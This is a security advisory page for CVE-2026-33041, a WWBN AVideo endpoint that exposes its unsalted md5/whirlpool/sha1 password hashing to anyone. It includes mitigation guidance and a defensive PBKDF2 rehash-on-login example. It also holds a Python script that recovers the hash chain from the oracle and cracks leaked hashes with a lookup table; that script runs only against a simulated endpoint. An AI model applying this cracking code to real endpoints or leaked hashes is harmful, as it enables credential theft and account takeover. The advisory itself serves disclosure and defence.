CVE-2026-33041: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor in WWBN AVideo
WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/encryptPass.json.php exposes the application's password hashing algorithm to any unauthenticated user. An attacker can submit arbitrary passwords and receive their hashed equivalents, enabling offline password cracking against leaked database hashes. If an attacker obtains password hashes from the database (via SQL injection, backup exposure, etc.), they can instantly crack them by comparing against pre-computed hashes from this endpoint. This endpoint eliminates the need for an attacker to reverse-engineer the hashing algorithm. Combined with the weak hash chain (md5+whirlpool+sha1, no salt by default), an attacker with access to database hashes can crack passwords extremely quickly. This issue was fixed in version 26.0.
AI Analysis
Technical Summary
CVE-2026-33041 affects WWBN AVideo 25.0 and earlier. The endpoint /objects/encryptPass.json.php accepts a plaintext password from any unauthenticated client and returns the hash the application would store for it, so the platform's password hashing scheme is an oracle anyone can query. The oracle itself is not the cracking engine: an attacker needs only a few queries to confirm the scheme and from then on computes it locally. What makes the disclosure damaging is the scheme it confirms, a chain of md5, whirlpool and sha1 that is cheap to compute and, in the default configuration, unsalted. Without a salt, one precomputed table of candidate passwords matches every row of a dumped users table, and identical passwords produce identical hashes across accounts and across installations. An attacker who has already obtained hashes through another weakness (SQL injection, an exposed backup, a careless export) can therefore recover weak passwords at full hardware speed without reverse-engineering the hashing code. This is a confidentiality issue: the endpoint exposes no hashes by itself, requires no privileges or user interaction, and becomes serious the moment hashes leak by any route. Version 26.0 fixes the issue; the advisory does not say how (whether the endpoint was removed, restricted, or the hashing scheme replaced). No exploitation in the wild had been reported as of publication.
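The two phases described above, a few oracle queries to confirm the scheme and then purely offline cracking, are shown in the Python below. This is an illustration added to this page, not code from AVideo or from the advisory. The endpoint is replaced by a local stand-in (simulated_oracle); the page names md5, whirlpool and sha1 but not the order in which they are chained, so the order used here is an assumption; and because whirlpool lives in OpenSSL 3's legacy provider and is missing from many Python builds, sha256 stands in for it where it is unavailable. The recovery and cracking logic is the same either way.

```python
"""Recover an unsalted hash chain from a hashing oracle, then crack leaked hashes offline."""
import hashlib
import itertools
from typing import Callable, Dict, Iterable, Optional, Tuple

Chain = Tuple[str, ...]


def _hashlib_works(name: str) -> bool:
    """True when this Python/OpenSSL build can compute the named digest."""
    try:
        hashlib.new(name, b"").hexdigest()
        return True
    except ValueError:
        return False


# Candidate primitives for the chain. sha256 substitutes for whirlpool when the
# local OpenSSL does not expose it (common with OpenSSL 3 without the legacy provider).
THIRD_PRIMITIVE = "whirlpool" if _hashlib_works("whirlpool") else "sha256"
PRIMITIVES = ("md5", "sha1", THIRD_PRIMITIVE)


def hash_chain(password: str, chain: Chain) -> str:
    """Apply the digests in order, feeding each hex digest (as ASCII) into the next,
    as a PHP expression such as md5(hash("whirlpool", sha1($p))) would."""
    data = password.encode()
    for name in chain:
        data = hashlib.new(name, data).hexdigest().encode()
    return data.decode()


# --- Stand-in for the exposed endpoint --------------------------------------
# Constructed for this example. The chain order is an assumption, not AVideo's code.
SIMULATED_CHAIN: Chain = ("sha1", THIRD_PRIMITIVE, "md5")
ORACLE_CALLS = {"count": 0}


def simulated_oracle(password: str) -> str:
    """Plays the role of /objects/encryptPass.json.php: plaintext in, stored hash out."""
    ORACLE_CALLS["count"] += 1
    return hash_chain(password, SIMULATED_CHAIN)


# --- Phase 1: two oracle queries pin down the algorithm ---------------------
def recover_chain(oracle: Callable[[str], str], probe: str = "probe") -> Optional[Chain]:
    """Try every ordering of 1..3 candidate primitives against one oracle answer.
    Returns None when nothing matches, which is what a salted scheme (or a
    primitive outside the candidate set) looks like from the outside."""
    observed = oracle(probe)
    if oracle(probe) != observed:  # randomised output on repeat => per-call salt
        return None
    for r in range(1, len(PRIMITIVES) + 1):
        for chain in itertools.permutations(PRIMITIVES, r):
            if hash_chain(probe, chain) == observed:
                return chain
    return None


# --- Phase 2: everything else happens offline, never touching the server ----
def build_lookup(chain: Chain, wordlist: Iterable[str]) -> Dict[str, str]:
    """One precomputed table serves every user, because there is no salt."""
    return {hash_chain(word, chain): word for word in wordlist}


def crack_all(leaked_hashes: Dict[str, str], table: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Map username -> recovered password (None when the password is not in the table)."""
    return {user: table.get(h) for user, h in leaked_hashes.items()}


if __name__ == "__main__":
    chain = recover_chain(simulated_oracle)
    print("recovered chain:", chain, "after", ORACLE_CALLS["count"], "oracle calls")
    # Constructed rows standing in for a dumped users table.
    leaked = {
        "alice": hash_chain("Summer2024!", SIMULATED_CHAIN),
        "bob": hash_chain("correct horse", SIMULATED_CHAIN),
        "carol": hash_chain("X7#kq9!pLm2v", SIMULATED_CHAIN),  # not in the wordlist
    }
    table = build_lookup(chain, ["password", "Summer2024!", "letmein", "correct horse"])
    print(crack_all(leaked, table))
    print("oracle calls used during cracking:", ORACLE_CALLS["count"])  # still 2
```

The point to take from the oracle-call counter is that rate-limiting or logging the endpoint changes nothing once the chain is known; the only defence that reaches phase 2 is a per-user salt combined with a slow hash, which is exactly what the None branch of recover_chain represents.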
Potential Impact
The impact falls on the confidentiality of user credentials. Attackers who already hold password hashes, whether from another vulnerability in the same deployment or from a data leak, can recover plaintext passwords quickly and at scale, because the confirmed scheme is fast and unsalted. Recovered credentials give account takeover on the video platform itself (access to private content, manipulation or deletion of uploads, privacy violations for uploaders and viewers) and, because users reuse passwords, a starting point for attacks on unrelated services. The flaw does not directly affect integrity or availability, but compromised accounts, administrator accounts in particular, can be used to reach them. The exposure needs no authentication or user interaction, so it is trivial to confirm across internet-facing instances, and it persists for as long as stored hashes remain in the unsalted format: a patched instance is still exposed to offline cracking of hashes dumped before the upgrade. Credential compromise of this kind also carries regulatory and breach-notification consequences wherever personal data is involved.
Mitigation Recommendations
Upgrade to WWBN AVideo 26.0 or later. Until then, block unauthenticated access to /objects/encryptPass.json.php at the web server, reverse proxy or WAF, while understanding what that buys: the product is open source, so the hashing scheme is readable in the code, and blocking the endpoint removes a convenience, not the underlying weakness. The durable fix is to stop storing unsalted fast-hash chains. Move to a salted, deliberately slow algorithm (Argon2id, bcrypt, or PBKDF2 with a per-user random salt) and rehash each user's password transparently on the next successful login, since the legacy format cannot be converted without the plaintext; expire or force-reset accounts that have not logged in after a reasonable period. Treat every existing hash as crackable: review where hashes could have leaked (database backups, exports, log files) and audit for injection flaws that would expose the users table. Reduce the value of any cracked credential with multi-factor authentication and a password policy that rejects common and previously breached passwords. Log and alert on requests to the hashing endpoint, since they are a cheap indicator that someone is probing an instance, but do not expect to detect the cracking itself, which happens offline. Finally, encourage unique, strong passwords; reuse is what turns one cracked platform account into access elsewhere.
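The rehash-on-login migration recommended above looks like this in Python, using PBKDF2-HMAC-SHA256 from the standard library so it runs without extra packages (Argon2id via a dedicated library would be the preferred choice in production). This is an added example, not code from AVideo. The legacy format is represented by a caller-supplied verify callable rather than the product's real chain, and the record layout, function names and iteration count are choices made for this illustration.

```python
"""Salted, slow password storage with transparent rehash-on-login."""
import hashlib
import hmac
import os
from typing import Callable, Dict, Optional

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # OWASP's 2023 figure for PBKDF2-HMAC-SHA256; raise as hardware allows
SALT_BYTES = 16


def hash_password(password: str, iterations: int = ITERATIONS, salt: Optional[bytes] = None) -> str:
    """Produce a self-describing record: algorithm$iterations$salt_hex$digest_hex.
    A fresh random salt per call means two users with the same password get
    different records, so one precomputed table cannot serve every account."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def is_modern(stored: str) -> bool:
    """Records in the new format carry their algorithm tag; anything else is legacy."""
    return stored.startswith(ALGORITHM + "$")


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the record's own salt and cost, then compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported record format: {algorithm}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def needs_rehash(stored: str, min_iterations: int = ITERATIONS) -> bool:
    """True for legacy records and for modern records below the current cost."""
    if not is_modern(stored):
        return True
    return int(stored.split("$")[1]) < min_iterations


def login(users: Dict[str, str], username: str, password: str,
          legacy_verify: Callable[[str, str], bool],
          iterations: int = ITERATIONS) -> bool:
    """Authenticate against whichever format the user currently has and, on success,
    replace a legacy or under-cost record with a fresh salted one. The plaintext is
    available only at this moment, which is why the migration has to ride on login."""
    stored = users.get(username)
    if stored is None:
        # Spend comparable time for unknown users so response timing does not leak usernames.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * SALT_BYTES, iterations)
        return False
    ok = verify_password(password, stored) if is_modern(stored) else legacy_verify(password, stored)
    if ok and needs_rehash(stored, iterations):
        users[username] = hash_password(password, iterations)
    return ok


if __name__ == "__main__":
    # Constructed stand-in for the legacy scheme (plain md5 here, NOT AVideo's chain).
    legacy_md5 = lambda pw, rec: hmac.compare_digest(hashlib.md5(pw.encode()).hexdigest(), rec)
    users = {"alice": hashlib.md5(b"Summer2024!").hexdigest()}  # constructed legacy row
    print("before:", users["alice"])
    print("login ok:", login(users, "alice", "Summer2024!", legacy_md5))
    print("after: ", users["alice"])  # now pbkdf2_sha256$600000$<salt>$<digest>
    print("rehash needed now?", needs_rehash(users["alice"]))
```

Two details matter for a migration like this: a failed login must leave the legacy record untouched, and the cost parameter must live in the record so that it can be raised later without another flag-day migration.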
Affected Countries
United States, Germany, France, United Kingdom, Canada, Australia, Netherlands, Japan, South Korea, India
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-03-17T18:10:50.210Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69bce490e32a4fbe5f3388a1
Added to database: 3/20/2026, 6:09:20 AM
Last enriched: 3/20/2026, 6:24:57 AM
Last updated: 5/2/2026, 6:22:13 PM
Views: 99